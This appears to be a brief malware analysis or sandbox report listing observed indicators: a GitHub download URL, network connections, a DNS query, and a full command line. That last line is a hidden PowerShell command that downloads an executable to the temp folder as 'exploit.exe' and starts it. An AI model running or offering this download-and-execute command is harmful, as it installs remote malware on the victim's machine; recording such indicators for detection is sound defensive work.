Technical Information
- https://github.com/gmhacx/abc/raw/main/abc.exe as %temp%\exploit.exe
- 'gi##ub.com':443
- 'gi##ub.com':443
- DNS ASK gi##ub.com
- '<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://github.com/gmhacx/ABC/raw/main/ABC.exe','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'